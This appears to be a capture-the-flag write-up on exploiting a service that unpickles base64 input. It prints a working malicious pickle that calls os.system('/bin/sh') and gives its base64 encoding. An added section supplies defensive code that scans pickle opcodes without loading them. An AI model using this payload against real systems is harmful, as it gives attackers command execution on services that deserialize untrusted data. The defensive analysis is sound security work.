![c137eac00d2400170113147f39020439.png](09e8c92baec849e6bc1d374cbcce8e39.png)

![b13965659266c0000667abac7fd4b2f6.png](25edeac7ae614c838e7efaa9f312a3e5.png)

The interesting function is `import`.

Breaking the `import` function gives us an error:

![059c87ed0ef3beee17af98c35484bd86.png](d6eae773fd604cfaa6c2a9f9a230fa11.png)

So it wants a **base64**-encoded pickle object, and we need to read the flag. Let's get a shell using a malicious pickle object.

Reading: https://checkoway.net/musings/pickle/

```
cos
system
(S'/bin/sh'
tR.
```

In this protocol 0 stream, `c` imports `os.system`, `(` and `S` push a mark and the string `/bin/sh`, `t` collects it into a tuple, `R` calls the imported function with that tuple as arguments, and `.` ends the pickle.

Base64-encoding that gives us `Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=`, and passing that to the program...

![a38a9edbb6e81a02fa0cc4e00f256497.png](171fb505de1b4d20831160e69e136111.png)
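
From the defender's side, the blob above can be inspected without ever calling `pickle.loads`. This is an added example, not part of the original write-up or the challenge's code; `scan_pickle`, `is_plain_data` and the benign sample are hypothetical names and constructed data, and the scan also covers the protocol 4+ `STACK_GLOBAL` form that the page's payload does not use.

```python
import base64
import pickle
import pickletools

# Opcodes that call a callable or construct an object while loading.
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

def scan_pickle(b64_blob):
    """Statically list imports and call opcodes in a pickle; never loads it."""
    data = base64.b64decode(b64_blob, validate=True)
    imports, calls, strings = [], [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):
            # genops reports the pair as a single "module name" string
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif op.name == "STACK_GLOBAL":
            # protocol 4+: module and name are the two strings pushed before it
            imports.append(tuple(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
        if op.name in CALL_OPS:
            calls.append(op.name)
    return {"imports": imports, "calls": calls}

def is_plain_data(b64_blob):
    """Accept only pickles that import nothing and call nothing."""
    try:
        report = scan_pickle(b64_blob)
    except ValueError:
        return False  # malformed base64 or a truncated/invalid opcode stream
    return not report["imports"] and not report["calls"]

# The blob from the write-up, and a constructed benign sample for comparison.
PAGE_PAYLOAD = "Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4="
BENIGN = base64.b64encode(pickle.dumps({"user": "guest", "score": 3})).decode()

if __name__ == "__main__":
    for label, blob in (("page payload", PAGE_PAYLOAD), ("benign", BENIGN)):
        print(label, scan_pickle(blob), "plain data:", is_plain_data(blob))
```

An opcode scan is a triage aid, not a sandbox: the robust fix is to not unpickle untrusted input at all, or to override `Unpickler.find_class` with an allowlist.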